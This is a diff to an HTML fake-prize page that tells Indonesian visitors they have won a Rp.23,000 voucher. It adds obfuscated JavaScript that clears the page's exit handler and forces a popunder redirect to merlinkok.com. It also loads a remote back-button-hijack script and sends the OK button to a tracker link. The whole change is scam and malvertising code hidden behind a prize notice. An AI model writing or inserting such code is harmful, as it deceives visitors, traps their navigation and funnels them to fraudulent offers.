--- a/spin/84/index.html
+++ b/spin/84/index.html
@@ -42,7 +42,7 @@
     <meta content="text/html; charset=utf-8" http-equiv="content-type">
     <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0" name="viewport">
     <meta charset="utf-8">
-    <title>Xin chúc mừng!</title>
+    <title>Selamat!</title>
  
     <link href="css/sweetalert.css" rel="stylesheet" type="text/css">
     <link href="css/style_1.css" rel="stylesheet" type="text/css">
@@ -81,6 +81,23 @@
 </head>
 
 <body>
+	<!-- Popunder script -->
+    <script type="text/javascript">
+        var _0x47c8=['onbeforeunload'];(function(_0xca98db,_0x14ec84){var _0x11f679=function(_0x16b11c){while(--_0x16b11c){_0xca98db['push'](_0xca98db['shift']());}};_0x11f679(++_0x14ec84);}(_0x47c8,0x7e));var _0x12dd=function(_0xca98db,_0x14ec84){_0xca98db=_0xca98db-0x0;var _0x11f679=_0x47c8[_0xca98db];return _0x11f679;};function exit_a1(){window[_0x12dd('0x0')]=null;}
+    </script>
+        
+    <script>
+        var _0x19d6=['prototype','Constructor','indexOf','location','https://merlinkok.com/secondlink/LP1/index.html?key=m7oeo5qpelu3j0n8rqwb&c1=popunder&c2=all','assign','open','_blank','HTMLElement'];(function(_0x5b932b,_0x38c322){var _0x552ac9=function(_0x5426b0){while(--_0x5426b0){_0x5b932b['push'](_0x5b932b['shift']());}};_0x552ac9(++_0x38c322);}(_0x19d6,0x136));var _0x1126=function(_0x5b932b,_0x38c322){_0x5b932b=_0x5b932b-0x0;var _0x552ac9=_0x19d6[_0x5b932b];return _0x552ac9;};var isSafari=Object[_0x1126('0x5')]['toString']['call'](window[_0x1126('0x4')])[_0x1126('0x7')](_0x1126('0x6'))>0x0;function launchext(){setTimeout(function(){url=_0x1126('0x0');document[_0x1126('0x8')][_0x1126('0x1')](url);if(isSafari){window[_0x1126('0x2')]('',_0x1126('0x3'));}},0x3e8);return![];}
+    </script>
+        
+    <!-- BBR -->
+    <script type="text/javascript" src="https://merlinkok.com/secondlink/LP1/backoffer.js"></script>
+    <script type="text/javascript">
+            (function(w) {
+                w.backOfferUrl = 'https://merlinkok.com/secondlink/LP1/index.html?key=m7oeo5qpelu3j0n8rqwb&c1=bbr&c2=all'
+            }
+            (window));
+    </script>
  
     <audio autoplay="autoplay" class="foo" preload="">
         <source src="warning.wav" type="audio/vnd.wave">
@@ -215,7 +232,7 @@
             <p> Anda telah memenangkan voucher Rp.23,000 . Silakan ikuti petunjuk untuk mengklaim bonus Anda.
             </p>
             <div class="sa-button-container">
-                <div class="sa-confirm-button-container"><button class="ord-btn__btn" style="display: inline-block;box-shadow: rgba(140, 212, 245, 0.8) 0px 0px 2px, rgba(0, 0, 0, 0.0470588) 0px 0px 0px 1px inset; background-color: rgb(232, 66, 66);"><a href="#" style="padding:0px;background-color:#e84242;margin:0;border:0px;"> OK </a></button>
+                <div class="sa-confirm-button-container"><button class="ord-btn__btn" style="display: inline-block;box-shadow: rgba(140, 212, 245, 0.8) 0px 0px 2px, rgba(0, 0, 0, 0.0470588) 0px 0px 0px 1px inset; background-color: rgb(232, 66, 66);"><a href="https://binom.blinkgo.top/cgial1k.php?lp=1" class="button" onclick="launchext(); exit_a1();" target="_blank" style="padding:0px;background-color:#e84242;margin:0;border:0px;"> OK </a></button>
                     <div class="la-ball-fall"></div>
                 </div>
             </div>
